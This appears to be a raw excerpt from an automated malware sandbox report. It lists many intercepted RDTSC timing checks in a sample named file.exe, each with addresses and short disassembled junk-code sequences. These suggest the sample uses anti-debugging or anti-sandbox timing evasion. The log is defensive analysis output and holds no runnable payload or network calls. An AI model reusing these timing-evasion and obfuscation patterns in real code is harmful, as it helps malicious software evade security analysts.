Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7FFE second address: AB8002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47CC4 second address: B47CD0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47CD0 second address: B47CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA850 second address: AAA85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B48E43 second address: B48E4F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C222 second address: B4C227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C227 second address: B4C236 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4F79648h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C396 second address: B4C39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C39A second address: B4C39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C39E second address: B4C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C3A4 second address: B4C3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F79657h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C3C1 second address: B4C3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C66D second address: B4C678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4FD2D second address: B4FD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CB4FA4D32h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4FD3B second address: B4FD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F493 second address: B4F497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F497 second address: B4F4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CB4F79654h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F4B1 second address: B4F4BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F4BB second address: B4F4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1CB4F79646h 0x0000000a push edx 0x0000000b jmp 00007F1CB4F79653h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F1CB4F7964Fh 0x0000001b push edi 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edi 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F626 second address: B4F62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F62B second address: B4F631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F631 second address: B4F637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F785 second address: B4F790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1CB4F79646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F790 second address: B4F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F1CB4FA4D16h 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007F1CB4FA4D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57B7C second address: B57B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BAE second address: B55BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4FA4D1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BC1 second address: B55BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F1CB4F7964Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BE7 second address: B55BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56153 second address: B56157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56157 second address: B56174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5647E second address: B56485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCC7 second address: B5FCCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCCD second address: B5FCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCD3 second address: B5FCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCE6 second address: B5FCFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnp 00007F1CB4F79648h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCFB second address: B5FD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EEA8 second address: B5EECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79658h 0x00000007 je 00007F1CB4F7964Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EECA second address: B5EEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007F1CB4FA4D1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F146 second address: B5F14B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F27A second address: B5F27E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F55E second address: B5F568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F568 second address: B5F595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D26h 0x00000007 jmp 00007F1CB4FA4D1Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F595 second address: B5F5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F99A second address: B5F9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F9A0 second address: B5F9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1CB4F79658h 0x0000000d jc 00007F1CB4F79646h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6128F second address: B61295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68BCC second address: B68BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68BD0 second address: B68BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D28h 0x00000007 jns 00007F1CB4FA4D16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jnc 00007F1CB4FA4D16h 0x00000016 pop edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670AF second address: B670BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F1CB4F79646h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670BC second address: B670C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670C6 second address: B670E4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1CB4F79646h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F1CB4F7964Dh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670E4 second address: B670EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B674FD second address: B6751D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F1CB4F7964Ch 0x00000010 ja 00007F1CB4F79646h 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F1CB4F79646h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6751D second address: B67521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67689 second address: B6768D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677F5 second address: B677F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677F9 second address: B677FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677FF second address: B67805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67805 second address: B6780F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6780F second address: B67813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AE8 second address: B67AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AEE second address: B67AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1CB4FA4D22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AFC second address: B67B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1CB4F79646h 0x0000000a pushad 0x0000000b jmp 00007F1CB4F79654h 0x00000010 jng 00007F1CB4F79646h 0x00000016 jmp 00007F1CB4F7964Bh 0x0000001b popad 0x0000001c popad 0x0000001d push ecx 0x0000001e pushad 0x0000001f jns 00007F1CB4F79646h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B682CE second address: B682E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1CB4FA4D1Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B689EF second address: B689F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B689F5 second address: B689F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD26 second address: B6FD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD2C second address: B6FD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD49 second address: B6FD4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7301C second address: B73021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73021 second address: B73033 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CB4F79648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73033 second address: B7304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7304C second address: B73061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73061 second address: B73069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73069 second address: B7306D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C723 second address: B7C75C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CB4FA4D23h 0x00000010 jmp 00007F1CB4FA4D21h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDCA second address: B7DDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDCE second address: B7DDFA instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CB4FA4D16h 0x00000008 jnl 00007F1CB4FA4D16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F1CB4FA4D2Ch 0x00000016 jmp 00007F1CB4FA4D20h 0x0000001b jns 00007F1CB4FA4D16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDFA second address: B7DE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7290 second address: AA72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72A3 second address: AA72D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79653h 0x00000008 jmp 00007F1CB4F79653h 0x0000000d jg 00007F1CB4F79646h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72D9 second address: AA72DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72DD second address: AA72E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8DA24 second address: B8DA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8DA29 second address: B8DA30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A601 second address: B9A607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A607 second address: B9A614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1CB4F79646h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98F2C second address: B98F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98F36 second address: B98F52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1CB4F79656h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9908D second address: B99093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99093 second address: B99099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B995B7 second address: B995BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B995BD second address: B995DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F1CB4F79655h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99756 second address: B9975E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9975E second address: B99762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99762 second address: B99777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1CB4FA4D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99777 second address: B99784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F1CB4F79646h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99784 second address: B997A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4FA4D27h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997A1 second address: B997B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99914 second address: B99928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1CB4FA4D1Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99928 second address: B9994A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1CB4F79659h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9994A second address: B99972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Dh 0x00000009 jmp 00007F1CB4FA4D27h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99972 second address: B99978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A354 second address: B9A358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F80BEE second address: 6F80C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
